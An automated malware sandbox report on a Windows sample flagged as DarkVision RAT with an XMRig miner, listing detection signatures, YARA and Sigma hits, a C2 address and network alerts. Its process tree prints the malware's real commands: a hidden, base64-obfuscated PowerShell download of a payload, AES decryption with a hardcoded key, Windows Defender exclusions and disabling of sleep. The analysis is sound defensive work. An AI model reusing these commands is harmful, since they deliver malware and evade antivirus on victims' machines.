
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1571252
MD5: a3d68745e8919e2a48d8fa0738da124e
SHA1: 85ea6ab1d2d3f6af2011b130756d57f31539e171
SHA256: 65bc085f99db63b0581b2153a0aa2d7151133aafeeb2810f56a5d17ef9760d46
Tags: exe, user-Bitsight

Detection

Malware families: DarkVision Rat, Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Benign windows process drops PE files
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected DarkVision Rat
Yara detected UAC Bypass using CMSTP
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal saved passwords of Firefox
Drops script or batch files to the startup folder
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking mutex)
Found evasive API chain checking for user administrative privileges
Found suspicious powershell code related to unpacking or dynamic code loading
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Powershell drops PE file
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Searches for specific processes (likely to inject)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Uses powercfg.exe to modify the power settings
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query locales information (e.g. system language)
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates driver files
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Remote Thread Creation By Uncommon Source Image
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Terminates after testing mutex exists (may check infected machine status)
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 2200 cmdline: "C:\Users\user\Desktop\file.exe" MD5: A3D68745E8919E2A48D8FA0738DA124E)
    • cmd.exe (PID: 1800 cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\295B.tmp\295C.tmp\295D.bat C:\Users\user\Desktop\file.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net.exe (PID: 4456 cmdline: net session MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
        • net1.exe (PID: 5800 cmdline: C:\Windows\system32\net1 session MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
      • powershell.exe (PID: 7000 cmdline: PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 7216 cmdline: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • timeout.exe (PID: 7392 cmdline: timeout /t 10 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
      • powershell.exe (PID: 7644 cmdline: powershell -WindowStyle Hidden -Command "$key = [System.Text.Encoding]::UTF8.GetBytes('blMgb+WrfPrXMFxK7ymKPM3SVHUAYPt9');" "$iv = [System.Text.Encoding]::UTF8.GetBytes('5t9nsUPo0cA/tUjH');" "$aes = [System.Security.Cryptography.Aes]::Create();" "$aes.Key = $key; $aes.IV = $iv;" "$decryptor = $aes.CreateDecryptor();" "$inputFile = 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin';" "$encryptedBytes = [System.IO.File]::ReadAllBytes($inputFile);" "$decryptedBytes = $decryptor.TransformFinalBlock($encryptedBytes, 0, $encryptedBytes.Length);" "$outputFile = 'C:\Users\user\AppData\Local\Temp\downloaded_file.exe';" "[System.IO.File]::WriteAllBytes($outputFile, $decryptedBytes);" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • downloaded_file.exe (PID: 7724 cmdline: "C:\Users\user\AppData\Local\Temp\downloaded_file.exe" MD5: D60C9E070239F8C240AAA6D8832E11EF)
        • cmd.exe (PID: 7740 cmdline: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSystem\WindowsSystem.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7800 cmdline: powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSystem\WindowsSystem.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • explorer.exe (PID: 7784 cmdline: "C:\Windows\explorer.exe" MD5: 662F4F92FDE3557E86D110526BB578D5)
          • explorer.exe (PID: 8028 cmdline: C:\Windows\EXPLORER.EXE {DF4EE2DA-C20C-4BBF-97D5-4B94E23FE1C8} MD5: 662F4F92FDE3557E86D110526BB578D5)
          • WindosCPUsystem.exe (PID: 8084 cmdline: "C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe" "" MD5: 56EC5472231866630749CCF6977C4FBD)
            • powercfg.exe (PID: 8100 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
              • conhost.exe (PID: 8116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powercfg.exe (PID: 8108 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
              • conhost.exe (PID: 8132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powercfg.exe (PID: 8124 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
              • conhost.exe (PID: 8152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powercfg.exe (PID: 8140 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
              • conhost.exe (PID: 8172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • explorer.exe (PID: 1436 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • cmd.exe (PID: 7144 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AutoRun_WindosCPUsystem.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WindosCPUsystem.exe (PID: 1196 cmdline: "C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe" MD5: 56EC5472231866630749CCF6977C4FBD)
      • powercfg.exe (PID: 3164 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 7240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 4476 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 4168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 4264 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 5696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 6448 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 5336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Malware family reference (Malpedia):
Name: xmrig
Description: According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Extracted malware configuration: {"C2": "185.157.162.216", "Port": 5200}
Yara matches (dropped files):
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe, Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Author: Joe Security
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe, Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Author: Joe Security
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe, Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
  • 0x31980:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x318c0:$s1: CoGetObject
  • 0x31948:$s2: Elevation:Administrator!new:

Yara matches (memory dumps):
Source: 0000000C.00000002.1939596081.0000029E75EE0000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Author: Joe Security
Source: 0000000C.00000002.1939596081.0000029E75EE0000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Author: Joe Security
Source: 00000013.00000002.2047760821.0000016DE66D1000.00000004.00000020.00020000.00000000.sdmp, Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Author: unknown
  • 0x276b59:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x27a08f:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
Source: 0000001F.00000002.2065498416.000001677AB40000.00000040.00001000.00020000.00000000.sdmp, Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Author: unknown
  • 0x276b19:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x27a04f:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
Source: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp, Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Author: Joe Security
(24 further entries not shown in this excerpt)

Yara matches (unpacked PE files):
Source: 13.2.downloaded_file.exe.300000.0.unpack, Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Author: Joe Security
Source: 13.2.downloaded_file.exe.300000.0.unpack, Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Author: Joe Security
Source: 13.2.downloaded_file.exe.300000.0.unpack, Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
  • 0x31980:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x318c0:$s1: CoGetObject
  • 0x31948:$s2: Elevation:Administrator!new:
Source: 12.2.powershell.exe.29e75ee9280.1.unpack, Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Author: Joe Security
Source: 12.2.powershell.exe.29e75ee9280.1.unpack, Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Author: Joe Security
(22 further entries not shown in this excerpt)

Sigma Overview: Change of critical system settings
                    Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe" "", ParentImage: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe, ParentProcessId: 8084, ParentProcessName: WindosCPUsystem.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 8100, ProcessName: powercfg.exe

Sigma Overview: System Summary
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\295B.tmp\295C.tmp\295D.bat C:\Users\user\Desktop\file.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1800, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'", ProcessId: 7216, ProcessName: powershell.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\295B.tmp\295C.tmp\295D.bat C:\Users\user\Desktop\file.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1800, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'", ProcessId: 7216, ProcessName: powershell.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: >(^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\295B.tmp\295C.tmp\295D.bat C:\Users\user\Desktop\file.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1800, ParentProcessName: cmd.exe, ProcessCommandLine: PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7000, ProcessName: powershell.exe
                    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\295B.tmp\295C.tmp\295D.bat C:\Users\user\Desktop\file.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1800, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'", ProcessId: 7216, ProcessName: powershell.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\295B.tmp\295C.tmp\295D.bat C:\Users\user\Desktop\file.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1800, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'", ProcessId: 7216, ProcessName: powershell.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\295B.tmp\295C.tmp\295D.bat C:\Users\user\Desktop\file.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1800, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'", ProcessId: 7216, ProcessName: powershell.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: >(^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\295B.tmp\295C.tmp\295D.bat C:\Users\user\Desktop\file.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1800, ParentProcessName: cmd.exe, ProcessCommandLine: PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7000, ProcessName: powershell.exe
                    Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\explorer.exe, SourceProcessId: 7784, StartAddress: 4F0000, TargetImage: C:\Windows\explorer.exe, TargetProcessId: 8028
                    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\295B.tmp\295C.tmp\295D.bat C:\Users\user\Desktop\file.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1800, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'", ProcessId: 7216, ProcessName: powershell.exe
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: >(^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\295B.tmp\295C.tmp\295D.bat C:\Users\user\Desktop\file.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1800, ParentProcessName: cmd.exe, ProcessCommandLine: PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7000, ProcessName: powershell.exe

Sigma Overview: Data Obfuscation
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\System32\cmd.exe, ProcessId: 1800, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AutoRun_WindosCPUsystem.bat
Suricata IDS alerts:

| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-12-09T07:37:36.142909+0100 | 2036289 | 2 | Crypto Currency Mining Activity Detected | 192.168.2.4 | 54892 | 1.1.1.1 | 53 | UDP |
| 2024-12-09T07:37:29.980726+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49738 | 154.216.20.243 | 443 | TCP |
| 2024-12-09T07:37:30.470669+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49737 | 154.216.20.243 | 443 | TCP |
| 2024-12-09T07:38:05.335051+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49740 | 154.216.20.243 | 443 | TCP |
